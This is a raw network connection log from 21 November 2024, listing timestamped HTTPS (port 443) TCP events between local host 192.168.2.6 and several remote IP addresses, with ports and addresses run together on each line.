                                                                                                                                                                      Nov 21, 2024 06:23:23.036077976 CET49720443192.168.2.640.113.110.67
                                                                                                                                                                      Nov 21, 2024 06:23:23.036231995 CET49720443192.168.2.640.113.110.67
                                                                                                                                                                      Nov 21, 2024 06:23:23.036272049 CET4434972040.113.110.67192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:23.666163921 CET4434972413.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:23.666672945 CET49724443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:23.666692019 CET4434972413.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:23.667207956 CET49724443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:23.667213917 CET4434972413.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:23.721375942 CET4434972213.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:23.721894979 CET49722443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:23.721923113 CET4434972213.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:23.722311020 CET49722443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:23.722316980 CET4434972213.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:23.724534035 CET4434972113.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:23.724885941 CET49721443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:23.724905968 CET4434972113.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:23.725321054 CET49721443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:23.725326061 CET4434972113.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:23.792344093 CET4434972313.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:23.792843103 CET49723443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:23.792869091 CET4434972313.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:23.793426037 CET49723443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:23.793430090 CET4434972313.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:23.796861887 CET4434972513.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:23.797291040 CET49725443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:23.797324896 CET4434972513.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:23.797600031 CET49725443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:23.797616959 CET4434972513.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:23.833920002 CET44349726188.114.97.3192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:23.834008932 CET49726443192.168.2.6188.114.97.3
                                                                                                                                                                      Nov 21, 2024 06:23:23.835624933 CET49726443192.168.2.6188.114.97.3
                                                                                                                                                                      Nov 21, 2024 06:23:23.835634947 CET44349726188.114.97.3192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:23.836040974 CET44349726188.114.97.3192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:23.837436914 CET49726443192.168.2.6188.114.97.3
                                                                                                                                                                      Nov 21, 2024 06:23:23.837518930 CET49726443192.168.2.6188.114.97.3
                                                                                                                                                                      Nov 21, 2024 06:23:23.837542057 CET44349726188.114.97.3192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:23.837601900 CET49726443192.168.2.6188.114.97.3
                                                                                                                                                                      Nov 21, 2024 06:23:23.837614059 CET44349726188.114.97.3192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:24.108467102 CET4434972413.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:24.108520031 CET4434972413.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:24.108607054 CET49724443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:24.108813047 CET49724443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:24.108813047 CET49724443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:24.108834982 CET4434972413.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:24.108846903 CET4434972413.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:24.111430883 CET49727443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:24.111532927 CET4434972713.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:24.111614943 CET49727443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:24.111798048 CET49727443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:24.111835957 CET4434972713.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:24.164737940 CET4434972213.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:24.164810896 CET4434972213.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:24.164895058 CET49722443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:24.165745020 CET49722443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:24.165745020 CET49722443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:24.165766001 CET4434972213.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:24.165776968 CET4434972213.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:24.176693916 CET49728443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:24.176775932 CET4434972813.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:24.176867008 CET49728443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:24.176997900 CET49728443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:24.177022934 CET4434972813.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:24.177293062 CET4434972113.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:24.177449942 CET4434972113.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:24.177500963 CET49721443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:24.177530050 CET49721443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:24.177530050 CET49721443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:24.177547932 CET4434972113.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:24.177556038 CET4434972113.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:24.179687023 CET49729443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:24.179719925 CET4434972913.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:24.179833889 CET49729443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:24.179891109 CET49729443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:24.179899931 CET4434972913.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:24.247054100 CET4434972313.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:24.247138023 CET4434972313.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:24.247190952 CET49723443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:24.247376919 CET49723443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:24.247396946 CET4434972313.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:24.247407913 CET49723443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:24.247412920 CET4434972313.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:24.249838114 CET49730443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:24.249906063 CET4434973013.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:24.249984980 CET49730443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:24.250109911 CET49730443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:24.250138044 CET4434973013.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:24.251533031 CET4434972513.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:24.251591921 CET4434972513.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:24.251643896 CET49725443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:24.251738071 CET49725443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:24.251763105 CET4434972513.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:24.251787901 CET49725443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:24.251800060 CET4434972513.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:24.253810883 CET49731443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:24.253844976 CET4434973113.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:24.253930092 CET49731443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:24.254050970 CET49731443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:24.254065037 CET4434973113.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:24.754719973 CET44349726188.114.97.3192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:24.754960060 CET44349726188.114.97.3192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:24.755038977 CET49726443192.168.2.6188.114.97.3
                                                                                                                                                                      Nov 21, 2024 06:23:24.755289078 CET49726443192.168.2.6188.114.97.3
                                                                                                                                                                      Nov 21, 2024 06:23:24.755310059 CET44349726188.114.97.3192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:25.634197950 CET49732443192.168.2.6188.114.97.3
                                                                                                                                                                      Nov 21, 2024 06:23:25.634279013 CET44349732188.114.97.3192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:25.634371042 CET49732443192.168.2.6188.114.97.3
                                                                                                                                                                      Nov 21, 2024 06:23:25.634754896 CET49732443192.168.2.6188.114.97.3
                                                                                                                                                                      Nov 21, 2024 06:23:25.634783030 CET44349732188.114.97.3192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:25.836292982 CET4434972713.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:25.837049007 CET49727443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:25.837102890 CET4434972713.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:25.837641954 CET49727443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:25.837656021 CET4434972713.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:25.961772919 CET4434972813.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:25.962249994 CET49728443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:25.962285995 CET4434972813.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:25.962733030 CET49728443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:25.962743998 CET4434972813.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:25.962886095 CET4434972913.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:25.963337898 CET49729443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:25.963361025 CET4434972913.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:25.963903904 CET49729443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:25.963910103 CET4434972913.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:25.967770100 CET4434973113.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:25.968013048 CET49731443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:25.968025923 CET4434973113.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:25.968457937 CET49731443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:25.968466043 CET4434973113.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:26.100451946 CET4434973013.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:26.101294994 CET49730443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:26.101358891 CET4434973013.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:26.101792097 CET49730443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:26.101807117 CET4434973013.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:26.275145054 CET4434972713.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:26.275202990 CET4434972713.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:26.275367975 CET49727443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:26.275459051 CET49727443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:26.275492907 CET4434972713.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:26.275520086 CET49727443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:26.275536060 CET4434972713.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:26.278342009 CET49733443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:26.278377056 CET4434973313.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:26.278580904 CET49733443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:26.278713942 CET49733443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:26.278727055 CET4434973313.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:26.403692007 CET4434973113.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:26.403769970 CET4434973113.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:26.404015064 CET49731443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:26.404059887 CET49731443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:26.404059887 CET49731443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:26.404073954 CET4434973113.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:26.404077053 CET4434973113.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:26.406482935 CET49734443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:26.406538010 CET4434973413.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:26.406636953 CET49734443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:26.406805992 CET49734443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:26.406835079 CET4434973413.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:26.407707930 CET4434972813.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:26.407727003 CET4434972913.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:26.407793045 CET4434972913.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:26.407845974 CET49729443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:26.407874107 CET4434972813.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:26.407951117 CET49728443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:26.407999039 CET49729443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:26.408008099 CET4434972913.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:26.408023119 CET49729443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:26.408026934 CET4434972913.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:26.408029079 CET49728443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:26.408029079 CET49728443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:26.408055067 CET4434972813.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:26.408065081 CET4434972813.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:26.410026073 CET49735443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:26.410058975 CET4434973513.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:26.410160065 CET49735443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:26.410204887 CET49736443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:26.410269976 CET49735443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:26.410283089 CET4434973513.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:26.410290003 CET4434973613.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:26.410356998 CET49736443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:26.410501003 CET49736443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:26.410540104 CET4434973613.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:26.556747913 CET4434973013.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:26.556818008 CET4434973013.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:26.556884050 CET49730443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:26.561911106 CET49730443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:26.561940908 CET4434973013.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:26.561954975 CET49730443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:26.561961889 CET4434973013.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:26.564908981 CET49737443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:26.564954042 CET4434973713.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:26.565196991 CET49737443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:26.566308022 CET49737443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:26.566323996 CET4434973713.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:26.804472923 CET49738443192.168.2.652.149.20.212
                                                                                                                                                                      Nov 21, 2024 06:23:26.804517031 CET4434973852.149.20.212192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:26.804752111 CET49738443192.168.2.652.149.20.212
                                                                                                                                                                      Nov 21, 2024 06:23:26.806883097 CET49738443192.168.2.652.149.20.212
                                                                                                                                                                      Nov 21, 2024 06:23:26.806896925 CET4434973852.149.20.212192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:26.896783113 CET44349732188.114.97.3192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:26.897011995 CET49732443192.168.2.6188.114.97.3
                                                                                                                                                                      Nov 21, 2024 06:23:26.898432016 CET49732443192.168.2.6188.114.97.3
                                                                                                                                                                      Nov 21, 2024 06:23:26.898446083 CET44349732188.114.97.3192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:26.898819923 CET44349732188.114.97.3192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:26.900132895 CET49732443192.168.2.6188.114.97.3
                                                                                                                                                                      Nov 21, 2024 06:23:26.900295019 CET49732443192.168.2.6188.114.97.3
                                                                                                                                                                      Nov 21, 2024 06:23:26.900305033 CET44349732188.114.97.3192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:27.619846106 CET44349732188.114.97.3192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:27.620134115 CET44349732188.114.97.3192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:27.620224953 CET49732443192.168.2.6188.114.97.3
                                                                                                                                                                      Nov 21, 2024 06:23:27.674418926 CET49732443192.168.2.6188.114.97.3
                                                                                                                                                                      Nov 21, 2024 06:23:27.674463034 CET44349732188.114.97.3192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:28.139252901 CET4434973313.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:28.139698029 CET49733443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:28.139724016 CET4434973313.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:28.140249014 CET49733443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:28.140254021 CET4434973313.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:28.190210104 CET4434973413.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:28.190609932 CET49734443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:28.190633059 CET4434973413.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:28.191034079 CET49734443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:28.191057920 CET4434973413.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:28.194989920 CET4434973513.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:28.195327044 CET49735443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:28.195343018 CET4434973513.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:28.195738077 CET49735443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:28.195743084 CET4434973513.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:28.196050882 CET4434973613.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:28.196460962 CET49736443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:28.196491003 CET4434973613.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:28.197065115 CET49736443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:28.197071075 CET4434973613.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:28.460150003 CET49740443192.168.2.6188.114.97.3
                                                                                                                                                                      Nov 21, 2024 06:23:28.460192919 CET44349740188.114.97.3192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:28.460443020 CET49740443192.168.2.6188.114.97.3
                                                                                                                                                                      Nov 21, 2024 06:23:28.460791111 CET49740443192.168.2.6188.114.97.3
                                                                                                                                                                      Nov 21, 2024 06:23:28.460810900 CET44349740188.114.97.3192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:28.491544962 CET4434973713.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:28.491956949 CET49737443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:28.491976023 CET4434973713.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:28.492405891 CET49737443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:28.492412090 CET4434973713.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:28.584592104 CET4434973313.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:28.584660053 CET4434973313.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:28.584831953 CET49733443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:28.584979057 CET49733443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:28.584996939 CET4434973313.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:28.585005045 CET49733443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:28.585011959 CET4434973313.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:28.587928057 CET49741443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:28.587958097 CET4434974113.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:28.588041067 CET49741443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:28.588191986 CET49741443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:28.588210106 CET4434974113.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:28.629631042 CET4434973852.149.20.212192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:28.629724026 CET49738443192.168.2.652.149.20.212
                                                                                                                                                                      Nov 21, 2024 06:23:28.631364107 CET49738443192.168.2.652.149.20.212
                                                                                                                                                                      Nov 21, 2024 06:23:28.631370068 CET4434973852.149.20.212192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:28.631622076 CET4434973852.149.20.212192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:28.632265091 CET4434973413.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:28.632400990 CET4434973413.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:28.632477999 CET49734443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:28.632616997 CET49734443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:28.632637978 CET4434973413.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:28.632652044 CET49734443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:28.632658005 CET4434973413.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:28.636881113 CET49742443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:28.636920929 CET4434974213.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:28.637288094 CET49742443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:28.637547016 CET49742443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:28.637564898 CET4434974213.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:28.639391899 CET4434973513.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:28.639468908 CET4434973513.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:28.639530897 CET49735443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:28.642293930 CET4434973613.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:28.642360926 CET4434973613.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:28.642421961 CET49736443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:28.647610903 CET49735443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:28.647633076 CET4434973513.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:28.647644043 CET49735443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:28.647650003 CET4434973513.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:28.661417007 CET49736443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:28.661417007 CET49736443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:28.661499023 CET4434973613.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:28.661534071 CET4434973613.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:28.665591002 CET49743443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:28.665640116 CET4434974313.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:28.665743113 CET49743443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:28.666938066 CET49744443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:28.666980028 CET4434974413.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:28.667079926 CET49743443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:28.667109966 CET4434974313.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:28.667121887 CET49744443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:28.667197943 CET49744443192.168.2.613.107.246.45
                                                                                                                                                                      Nov 21, 2024 06:23:28.667207956 CET4434974413.107.246.45192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:28.680999041 CET49738443192.168.2.652.149.20.212
                                                                                                                                                                      Nov 21, 2024 06:23:28.707232952 CET49738443192.168.2.652.149.20.212
